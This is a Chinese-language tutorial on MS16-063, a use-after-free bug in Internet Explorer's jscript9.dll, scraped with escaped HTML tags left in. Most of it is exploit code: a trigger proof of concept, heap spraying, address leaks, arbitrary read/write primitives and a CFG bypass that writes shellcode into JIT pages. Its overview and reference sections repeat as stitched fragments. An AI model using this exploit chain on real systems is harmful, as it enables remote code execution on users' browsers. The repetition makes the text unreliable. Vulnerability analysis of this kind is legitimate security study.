MS16-063漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
MS16-063是Internet Explorer中jscript9.dll组件的一个Use-After-Free (UAF)漏洞。该漏洞存在于JScript引擎处理TypedArray和ArrayBuffer对象时的内存管理机制中，攻击者可以通过精心构造的网页利用此漏洞实现任意代码执行。<\/p>

漏洞环境<\/h2>

测试系统<\/strong>: Windows 7 SP1 32位<\/li>
浏览器版本<\/strong>: Internet Explorer 11.0.9600.18204<\/li>

调试工具<\/strong>:

GFlags (启用堆调试和堆分配回溯)<\/li>
Windbg<\/li> <\/ul> <\/li> <\/ul>
漏洞分析<\/h2>
POC分析<\/h3>
<html<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span>function<\/span> pwn<\/span>() { <\/span><\/span> var<\/span> ab<\/span> =<\/span> new<\/span> ArrayBuffer<\/span>(1000<\/span> *<\/span> 1024<\/span>); \/\/ 分配ArrayBuffer <\/span><\/span><\/span><\/span> var<\/span> ia<\/span> =<\/span> new<\/span> Int8Array<\/span>(ab<\/span>); \/\/ 创建引用同一内存的TypedArray <\/span><\/span><\/span><\/span> detach<\/span>(ab<\/span>); \/\/ 释放ArrayBuffer <\/span><\/span><\/span><\/span> setTimeout<\/span>(main<\/span>, 50<\/span>, ia<\/span>); \/\/ 延迟执行写入操作 <\/span><\/span><\/span><\/span> <\/span><\/span> function<\/span> detach<\/span>(ab<\/span>) { <\/span><\/span> postMessage<\/span>(""<\/span>, "*"<\/span>, [ab<\/span>]); \/\/ 通过postMessage释放ArrayBuffer <\/span><\/span><\/span><\/span> } <\/span><\/span> <\/span><\/span> function<\/span> main<\/span>(ia<\/span>) { <\/span><\/span> ia<\/span>[100<\/span>] =<\/span> 0x41414141<\/span>; \/\/ 触发UAF <\/span><\/span><\/span><\/span> } <\/span><\/span>} <\/span><\/span>pwn<\/span>() <\/span><\/span><\/script<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>漏洞原理<\/h3> TypedArray与ArrayBuffer关系<\/strong>:<\/p> 创建TypedArray时会内部创建一个ArrayBuffer<\/li> 如果提供ArrayBuffer作为构造参数，则直接使用该Buffer<\/li> 这样可以得到同一内存块的两个引用<\/li> <\/ul> <\/li> UAF产生原因<\/strong>:<\/p> postMessage<\/code>调用会释放ArrayBuffer<\/li> 但TypedArray仍保留对已释放内存的引用<\/li> 后续通过TypedArray写入时未检查内存是否有效<\/li> <\/ul> <\/li> 关键代码分析<\/strong>:<\/p> Js::TypedArray<char,0>::DirectSetItem<\/code>函数中: 检查索引范围(this[7]<\/code>)<\/li> 获取buffer地址(this[8]<\/code>)<\/li> 但未检查buffer是否已被释放<\/li> 直接写入(*(_BYTE *)(index + buffer) = v5<\/code>)<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 漏洞利用<\/h2> 利用环境<\/h3> Windows 10 1511 x86<\/li> IE 11.0.10586<\/li> <\/ul> 利用步骤<\/h3> 堆喷准备<\/strong>:<\/p> var<\/span> heapsrc<\/span> =<\/span> new<\/span> ArrayBuffer<\/span>(0x400<\/span> *<\/span> 0x400<\/span> *<\/span> 2<\/span> +<\/span> 0x400<\/span> *<\/span> 100<\/span>); <\/span><\/span>var<\/span> heapbak<\/span> =<\/span> new<\/span> Int8Array<\/span>(heapsrc<\/span>); <\/span><\/span><\/code><\/pre><\/li> 堆喷占位<\/strong>:<\/p> var<\/span> spray<\/span> =<\/span> new<\/span> Array(0x20000<\/span>); <\/span><\/span>var<\/span> slim<\/span> =<\/span> new<\/span> ArrayBuffer<\/span>(0x1456<\/span>); <\/span><\/span> <\/span><\/span>function<\/span> sprayHeap<\/span>(spray<\/span>){ <\/span><\/span> for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> spray<\/span>.length<\/span>; i<\/span>++<\/span>){ <\/span><\/span> spray<\/span>[i<\/span>] =<\/span> new<\/span> Uint8Array<\/span>(slim<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>sprayHeap<\/span>(spray<\/span>); <\/span><\/span><\/code><\/pre><\/li> 搜索可控结构<\/strong>:<\/p> for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; heapbak<\/span>[i<\/span>] !=<\/span> 0x56<\/span> ||<\/span> heapbak<\/span>[i<\/span>+<\/span>1<\/span>] !=<\/span> 0x14<\/span> ||<\/span> heapbak<\/span>[i<\/span>+<\/span>2<\/span>] !=<\/span> 0x00<\/span> ||<\/span> heapbak<\/span>[i<\/span>+<\/span>3<\/span>] !=<\/span> 0x00<\/span>; i<\/span>++<\/span>){ <\/span><\/span> if<\/span>(heapbak<\/span>[i<\/span>] ===<\/span> undefined<\/span>) { <\/span><\/span> alert<\/span>("search failed..."<\/span>); <\/span><\/span> return<\/span>; <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 定位并验证可控对象<\/strong>:<\/p> heapbak<\/span>[i<\/span>] +=<\/span> 1<\/span>; \/\/修改length为0x1457 <\/span><\/span><\/span><\/span>lengthIndex<\/span> =<\/span> i<\/span>; <\/span><\/span> <\/span><\/span>try<\/span> { <\/span><\/span> for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; spray<\/span>[i<\/span>] !=<\/span> 0x1457<\/span>; i<\/span>++<\/span>); <\/span><\/span>} catch<\/span>(e<\/span>){ <\/span><\/span> alert<\/span>("But Failed..."<\/span>); <\/span><\/span> return<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>mvslim<\/span> =<\/span> spray<\/span>[i<\/span>]; <\/span><\/span><\/code><\/pre><\/li> 泄露关键地址<\/strong>:<\/p> \/\/ 获取buffer地址 <\/span><\/span><\/span><\/span>var<\/span> bufaddr<\/span> =<\/span> ub<\/span>(heapbak<\/span>[lengthIndex<\/span>+<\/span>4<\/span>]) |<\/span> ub<\/span>(heapbak<\/span>[lengthIndex<\/span>+<\/span>4<\/span>+<\/span>1<\/span>]) <<<\/span> 8<\/span> |<\/span> <\/span><\/span> ub<\/span>(heapbak<\/span>[lengthIndex<\/span>+<\/span>4<\/span>+<\/span>2<\/span>]) <<<\/span> 16<\/span> |<\/span> ub<\/span>(heapbak<\/span>[lengthIndex<\/span>+<\/span>4<\/span>+<\/span>3<\/span>]) <<<\/span> 24<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 获取vftable地址 <\/span><\/span><\/span><\/span>var<\/span> vtable<\/span> =<\/span> ub<\/span>(heapbak<\/span>[lengthIndex<\/span>-<\/span>0x1c<\/span>]) |<\/span> ub<\/span>(heapbak<\/span>[lengthIndex<\/span>-<\/span>0x1c<\/span>+<\/span>1<\/span>]) <<<\/span> 8<\/span> |<\/span> <\/span><\/span> ub<\/span>(heapbak<\/span>[lengthIndex<\/span>-<\/span>0x1c<\/span>+<\/span>2<\/span>]) <<<\/span> 16<\/span> |<\/span> ub<\/span>(heapbak<\/span>[lengthIndex<\/span>-<\/span>0x1c<\/span>+<\/span>3<\/span>]) <<<\/span> 24<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 计算jscript9.dll基地址 <\/span><\/span><\/span><\/span>jscriptaddr<\/span> =<\/span> vtable<\/span> -<\/span> 0x1eeb4<\/span>; <\/span><\/span><\/code><\/pre><\/li> 构造读写原语<\/strong>:<\/p> \/\/ 任意地址写 <\/span><\/span><\/span><\/span>function<\/span> setBufferAddress<\/span>(addr<\/span>) { <\/span><\/span> heapbak<\/span>[lengthIndex<\/span>+<\/span>4<\/span>] =<\/span> addr<\/span> &<\/span> 0xff<\/span>; <\/span><\/span> heapbak<\/span>[lengthIndex<\/span>+<\/span>4<\/span>+<\/span>1<\/span>] =<\/span> (addr<\/span> >><\/span> 8<\/span>) &<\/span> 0xff<\/span>; <\/span><\/span> heapbak<\/span>[lengthIndex<\/span>+<\/span>4<\/span>+<\/span>2<\/span>] =<\/span> (addr<\/span> >><\/span> 16<\/span>) &<\/span> 0xff<\/span>; <\/span><\/span> heapbak<\/span>[lengthIndex<\/span>+<\/span>4<\/span>+<\/span>3<\/span>] =<\/span> (addr<\/span> >><\/span> 24<\/span>) &<\/span> 0xff<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 任意地址读 <\/span><\/span><\/span><\/span>function<\/span> readAddressN<\/span>(addr<\/span>, n<\/span>){ <\/span><\/span> if<\/span>(n<\/span> !=<\/span> 4<\/span> &&<\/span> n<\/span> !=<\/span> 8<\/span>) return<\/span> 0<\/span>; <\/span><\/span> setBufferAddress<\/span>(addr<\/span>); <\/span><\/span> var<\/span> ret<\/span> =<\/span> 0<\/span>; <\/span><\/span> for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> n<\/span>; i<\/span>++<\/span>) <\/span><\/span> ret<\/span> |=<\/span> (mvslim<\/span>[i<\/span>] <<<\/span> (i<\/span>*<\/span>8<\/span>)); <\/span><\/span> return<\/span> ret<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 任意地址写 <\/span><\/span><\/span><\/span>function<\/span> writeAddressN<\/span>(addr<\/span>, val<\/span>, n<\/span>){ <\/span><\/span> if<\/span>(n<\/span> !=<\/span> 4<\/span> &&<\/span> n<\/span> !=<\/span> 8<\/span>) return<\/span> 0<\/span>; <\/span><\/span> setBufferAddress<\/span>(addr<\/span>); <\/span><\/span> for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> n<\/span>; i<\/span>++<\/span>) <\/span><\/span> mvslim<\/span>[i<\/span>] =<\/span> (val<\/span> >><\/span> (i<\/span>*<\/span>8<\/span>)) &<\/span> 0xff<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 绕过CFG保护<\/h3> 触发JIT编译<\/strong>:<\/p> var<\/span> code<\/span> =<\/span> "var i= 100; var j = 1;"<\/span>; <\/span><\/span>for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 6500<\/span>; i<\/span>++<\/span>) { <\/span><\/span> code<\/span> +=<\/span> "i *= i + j.toString();"<\/span>; <\/span><\/span>} <\/span><\/span>code<\/span> +=<\/span> "return i.toString();"<\/span>; <\/span><\/span> <\/span><\/span>func<\/span> =<\/span> Function(code<\/span>); <\/span><\/span>for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 1000<\/span>; i<\/span>++<\/span>) { <\/span><\/span> func<\/span>.call<\/span>(); \/\/ 触发JIT <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 查找JIT代码缓冲区<\/strong>:<\/p> \/\/ 获取ThreadContext <\/span><\/span><\/span><\/span>var<\/span> threadctx<\/span> =<\/span> readAddressN<\/span>(jscriptaddr<\/span> +<\/span> 0x34a074<\/span>, 4<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 获取BackJobProcessor <\/span><\/span><\/span><\/span>var<\/span> bgjob<\/span> =<\/span> readAddressN<\/span>(threadctx<\/span> +<\/span> 0x3b0<\/span>, 4<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 获取PageAllocator <\/span><\/span><\/span><\/span>var<\/span> pgalloc<\/span> =<\/span> bgjob<\/span> +<\/span> 0x1c<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 查找LargeSegments列表 <\/span><\/span><\/span><\/span>while<\/span>(true<\/span>){ <\/span><\/span> var<\/span> largeSeg<\/span> =<\/span> readAddressN<\/span>(pgalloc<\/span> +<\/span> 0x24<\/span>, 4<\/span>); <\/span><\/span> if<\/span>(largeSeg<\/span> ==<\/span> pgalloc<\/span> +<\/span> 0x24<\/span>) continue<\/span>; <\/span><\/span> <\/span><\/span> var<\/span> page<\/span> =<\/span> readAddressN<\/span>(largeSeg<\/span> +<\/span> 8<\/span> +<\/span> 8<\/span>, 4<\/span>); <\/span><\/span> if<\/span>(page<\/span> ==<\/span> 0<\/span>) continue<\/span>; <\/span><\/span> <\/span><\/span> break<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 修改JIT代码<\/strong>:<\/p> var<\/span> race<\/span> =<\/span> function<\/span>(){ <\/span><\/span> var<\/span> largeSeg<\/span> =<\/span> readAddressN<\/span>(pgalloc<\/span> +<\/span> 0x24<\/span>, 4<\/span>); <\/span><\/span> if<\/span>(largeSeg<\/span> ==<\/span> pgalloc<\/span> +<\/span> 0x24<\/span>) return<\/span> false<\/span>; <\/span><\/span> <\/span><\/span> var<\/span> page<\/span> =<\/span> readAddressN<\/span>(largeSeg<\/span> +<\/span> 8<\/span> +<\/span> 8<\/span>, 4<\/span>); <\/span><\/span> if<\/span>(page<\/span> ==<\/span> 0<\/span>) return<\/span> false<\/span>; <\/span><\/span> <\/span><\/span> buf<\/span> =<\/span> page<\/span> +<\/span> 0x18<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 覆盖指令，避免覆盖重定位地址 <\/span><\/span><\/span><\/span> setBufferAddress<\/span>(buf<\/span>); <\/span><\/span> mvslim<\/span>[0<\/span>] =<\/span> 0xeb<\/span>; \/\/ jmp short <\/span><\/span><\/span><\/span> mvslim<\/span>[1<\/span>] =<\/span> 0x34<\/span>; \/\/ 跳转偏移 <\/span><\/span><\/span><\/span> <\/span><\/span> setBufferAddress<\/span>(buf<\/span> +<\/span> 0x36<\/span>); <\/span><\/span> mvslim<\/span>.set<\/span>(scbytes<\/span>, 0<\/span>); \/\/ 写入shellcode <\/span><\/span><\/span><\/span> <\/span><\/span> return<\/span> true<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 执行利用<\/strong>:<\/p> for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 1000<\/span>; i<\/span>++<\/span>) { <\/span><\/span> race<\/span>(); <\/span><\/span>} <\/span><\/span> <\/span><\/span>for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 1000<\/span>; i<\/span>++<\/span>) { <\/span><\/span> func<\/span>.call<\/span>(); \/\/ 触发JIT <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>while<\/span>(!<\/span>race<\/span>()); \/\/ 等待直到覆盖JIT块 <\/span><\/span><\/span><\/span> <\/span><\/span>for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 1000<\/span>; i<\/span>++<\/span>) { <\/span><\/span> func<\/span>.call<\/span>(); \/\/ 调用被覆盖的代码块 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 防御措施<\/h2> 及时安装微软提供的安全补丁<\/li> 启用增强的防护模式(Enhanced Protected Mode)<\/li> 使用控制流保护(CFG)等缓解技术<\/li> 限制或禁用Active Scripting<\/li> <\/ol> 参考链接<\/h2> Patch Analysis of MS16-063 (jscript9.dll)<\/a><\/li> TypedArray规范<\/a><\/li> 深入理解Double Free<\/a><\/li> <\/ol>

MS16-063漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> MS16-063是Internet Explorer中jscript9.dll组件的一个Use-After-Free (UAF)漏洞。该漏洞存在于JScript引擎处理TypedArray和ArrayBuffer对象时的内存管理机制中，攻击者可以通过精心构造的网页利用此漏洞实现任意代码执行。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

参考链接<\/h2> Patch Analysis of MS16-063 (jscript9.dll)<\/a><\/li> TypedArray规范<\/a><\/li> 深入理解Double Free<\/a><\/li> <\/ol>

漏洞概述<\/h2>
MS16-063是Internet Explorer中jscript9.dll组件的一个Use-After-Free (UAF)漏洞。该漏洞存在于JScript引擎处理TypedArray和ArrayBuffer对象时的内存管理机制中，攻击者可以通过精心构造的网页利用此漏洞实现任意代码执行。<\/p>

参考链接<\/h2>

Patch Analysis of MS16-063 (jscript9.dll)<\/a><\/li>
TypedArray规范<\/a><\/li>
深入理解Double Free<\/a><\/li> <\/ol>